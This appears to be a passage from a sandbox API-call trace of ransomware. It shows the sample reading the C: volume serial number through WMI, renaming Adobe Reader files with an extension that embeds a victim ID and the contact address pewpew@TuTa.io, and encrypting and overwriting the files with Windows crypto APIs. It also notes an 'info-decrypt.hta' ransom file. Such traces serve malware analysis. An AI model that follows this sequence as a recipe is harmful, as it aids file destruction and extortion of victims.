pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0204.712] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x1 [0204.712] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5ae84) returned 0x0 [0204.713] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5ae64) returned 0x0 [0204.713] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ae64, pProxy=0x60331bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.713] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x2 [0204.713] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0204.713] CoTaskMemFree (pv=0xbd4a68) [0204.713] WbemLocator:IUnknown:Release (This=0x60272a0) returned 0x0 [0204.713] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5ae84) returned 0x0 [0204.713] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0204.714] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0204.714] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0204.714] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0204.714] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0204.714] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5ade4) returned 0x0 [0204.715] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ade4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.715] WbemLocator:IUnknown:Release (This=0xb5ade4) returned 0x3 [0204.715] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0204.715] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0204.715] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5ae6c) returned 0x0 [0204.715] WbemLocator:IRpcOptions:Query (in: This=0xb5ae6c, pPrx=0xb5ae84, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0204.715] WbemLocator:IUnknown:Release (This=0xb5ae6c) returned 0x3 [0204.715] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0204.715] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0204.715] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0204.715] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60331bc) returned 0x0 [0204.715] WbemLocator:IUnknown:AddRef (This=0x60331bc) returned 0x4 [0204.715] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x3 [0204.715] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x2 [0204.715] SysStringLen (param_1=0x0) returned 0x0 [0204.715] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0204.715] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0204.715] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.715] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0204.716] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0204.716] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5ae84) returned 0x0 [0204.716] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x3 [0204.716] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0204.716] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0204.716] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.716] IWbemServices:GetObject (in: This=0x60331bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027e50, ppCallResult=0x0) returned 0x0 [0205.028] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0205.028] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0205.028] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.028] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x362e08c*=0, plFlavor=0x362e090*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x362e08c*=8, plFlavor=0x362e090*=0) returned 0x0 [0205.028] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.028] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.029] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x362e08c*=8, plFlavor=0x362e090*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x362e08c*=8, plFlavor=0x362e090*=0) returned 0x0 [0205.029] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.029] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.029] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", lpFilePart=0x0) returned 0x36 [0205.029] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0205.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0205.029] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x3377ab20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0205.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0205.029] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0205.030] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", lpFilePart=0x0) returned 0x36 [0205.030] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0205.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0205.030] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0205.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0205.030] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", lpFilePart=0x0) returned 0x36 [0205.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0205.031] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), fInfoLevelId=0x0, lpFileInformation=0x362e5c8 | out: lpFileInformation=0x362e5c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318)) returned 1 [0205.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0205.031] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", lpFilePart=0x0) returned 0x36 [0205.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0205.031] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0205.031] GetFileType (hFile=0x598) returned 0x1 [0205.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0205.031] GetFileType (hFile=0x598) returned 0x1 [0205.031] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4318 [0205.032] ReadFile (in: hFile=0x598, lpBuffer=0x362e7a0, nNumberOfBytesToRead=0x4318, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x362e7a0*, lpNumberOfBytesRead=0x8f6eedc*=0x4318, lpOverlapped=0x0) returned 1 [0205.298] CloseHandle (hObject=0x598) returned 1 [0205.298] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdffa8) returned 1 [0205.300] CryptGenRandom (in: hProv=0xbdffa8, dwLen=0x10, pbBuffer=0x3632e0c | out: pbBuffer=0x3632e0c) returned 1 [0205.885] CryptImportKey (in: hProv=0xbdffa8, pbData=0x37d2698, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f4d0) returned 1 [0205.885] CryptContextAddRef (hProv=0xbdffa8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.886] CryptContextAddRef (hProv=0xbdffa8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.886] CryptDuplicateKey (in: hKey=0xb7f4d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f650) returned 1 [0205.886] CryptContextAddRef (hProv=0xbdffa8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.886] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x37d2778*=0x1, dwFlags=0x0) returned 1 [0205.886] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x37d2744, dwFlags=0x0) returned 1 [0205.886] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37d2788*, pdwDataLen=0x8f6eea8*=0x4320, dwBufLen=0x4320 | out: pbData=0x37d2788*, pdwDataLen=0x8f6eea8*=0x4320) returned 1 [0205.886] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d6acc*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x37d6acc*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0205.888] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0205.888] CryptReleaseContext (hProv=0xbdffa8, dwFlags=0x0) returned 1 [0205.888] CryptReleaseContext (hProv=0xbdffa8, dwFlags=0x0) returned 1 [0205.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", lpFilePart=0x0) returned 0x36 [0205.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0205.888] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0205.890] GetFileType (hFile=0x32c) returned 0x1 [0205.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0205.890] GetFileType (hFile=0x32c) returned 0x1 [0205.890] WriteFile (in: hFile=0x32c, lpBuffer=0x37d70d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x37d70d4*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0205.891] CloseHandle (hObject=0x32c) returned 1 [0205.891] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0205.891] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.892] CoTaskMemFree (pv=0xbed438) [0205.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.892] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0205.892] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0205.892] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0205.892] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.893] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60272f0) returned 0x0 [0206.039] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0206.039] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x60313c0) returned 0x0 [0206.039] WbemDefPath:IUnknown:Release (This=0x60272f0) returned 0x0 [0206.039] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x60313c0) returned 0x0 [0206.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0206.040] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0206.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0206.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0206.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbdf150) returned 0x0 [0206.040] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf150, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.040] WbemDefPath:IUnknown:Release (This=0xbdf150) returned 0x3 [0206.040] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0206.040] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0206.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0206.040] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0206.040] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0206.040] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0206.040] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0206.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x60313c0) returned 0x0 [0206.040] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0206.040] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0206.040] WbemDefPath:IWbemPath:SetText (This=0x60313c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.040] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 